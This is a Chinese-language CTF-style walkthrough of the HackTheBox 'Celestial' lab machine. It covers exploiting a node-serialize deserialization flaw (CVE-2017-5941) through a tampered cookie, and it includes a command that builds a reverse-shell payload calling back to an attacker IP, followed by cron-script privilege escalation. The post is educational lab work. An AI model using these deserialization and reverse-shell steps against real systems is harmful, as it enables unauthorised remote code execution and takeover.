HackTheBox-Linux-Celestial

  • A+
所属分类:安全文章

一个每日分享渗透小技巧的公众号HackTheBox-Linux-Celestial



大家好,这里是 大余安全 的第 126 篇文章,本公众号会每日分享攻防渗透技术给大家。



HackTheBox-Linux-Celestial

靶机地址:https://www.hackthebox.eu/home/machines/profile/130

靶机难度:中级(4.8/10)

靶机发布日期:2018年8月25日

靶机描述:

Celestial is a medium difficulty machine which focuses on deserialization exploits. It is not the most realistic, however it provides a practical example of abusing client-size serialized objects in NodeJS framework.

请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。





一、信息收集

HackTheBox-Linux-Celestial


HackTheBox-Linux-Celestial

可以看到靶机的IP是10.10.10.85....

HackTheBox-Linux-Celestial

Nmap发现了3000端口运行着http服务,Node.js框架....

HackTheBox-Linux-Celestial

刚进入发现404,查看前端源码也没信息....

HackTheBox-Linux-Celestial

在刷新页面后更新了信息...显示以上结果...前端还是没信息...

HackTheBox-Linux-Celestial

burpsuit拦截发现了一串base64值....

HackTheBox-Linux-Celestial

可以知道这是一个Node.js Express框架,根据输出结果,可以修改cookie变换输出值...

HackTheBox-Linux-Celestial

echo eyJ1c2VybmFtZSI6IkR1bW15IiwiY291bnRyeSI6IklkayBQcm9iYWJseSBTb21ld2hlcmUgRHVtYiIsImNpdHkiOiJMYW1ldG93biIsIm51bSI6IjIifQ== | base64 -d | sed 's/"2"/"5"/g' | base64 -w0

通过"num":"2"更改"num":"5"并使用base64对其进行了编码输入到burp中,输出结果知道这是node-serialize模块导致的...

HackTheBox-Linux-Celestial

这里更直观的看到这是由node-serialize模块导致的,该模块是在unserialize函数模块中导致无法验证用户提供的输入,从而执行了JSON值内的所有内容...

开始利用反序列化漏洞提权...

HackTheBox-Linux-Celestial

https://hd7exploit.wordpress.com/2017/05/29/exploiting-node-js-deserialization-bug-for-remote-code-execution-cve-2017-5941/

这里详细讲述了node-serialize模块的利用方式...

HackTheBox-Linux-Celestial

按照文章利用即可...

HackTheBox-Linux-Celestial

sudo python nodeshell.py -r -h 10.10.14.51 -p 6666 -e -o

创建好shellcode....

HackTheBox-Linux-Celestial

然后利用burpsuit注入shell即可...

成功获得反向外壳....

HackTheBox-Linux-Celestial

获得了user_flag信息....

查看到还存在script.py脚本信息...

HackTheBox-Linux-Celestial

该脚本很可疑,我下载了pspy监测后端进程...上传

HackTheBox-Linux-Celestial

果然发现了该程序是在运行了...但不是root权限?

HackTheBox-Linux-Celestial

查看了后端日志后...发现该程序在执行root权限....尝试植入shell

HackTheBox-Linux-Celestial

利用简单shell,echo植入即可....

HackTheBox-Linux-Celestial

等待了好久...估计10分钟...才获得了反向外壳...pspy32监测一直没运行script.py...


HackTheBox-Linux-Celestial

获得了root权限,并获得了root_flag信息...

简单的提权...


由于我们已经成功得到root权限查看user和root.txt,因此完成这台中级的靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。


如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

HackTheBox-Linux-Celestial


如果觉得这篇文章对你有帮助,可以转发到朋友圈,谢谢小伙伴~

HackTheBox-Linux-Celestial
HackTheBox-Linux-Celestial


HackTheBox-Linux-Celestial


随缘收徒中~~随缘收徒中~~随缘收徒中~~


欢迎加入渗透学习交流群,想入群的小伙伴们加我微信,共同进步共同成长!

HackTheBox-Linux-Celestial

大余安全

一个全栈渗透小技巧的公众号

HackTheBox-Linux-Celestial


本文始发于微信公众号(大余安全):HackTheBox-Linux-Celestial

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: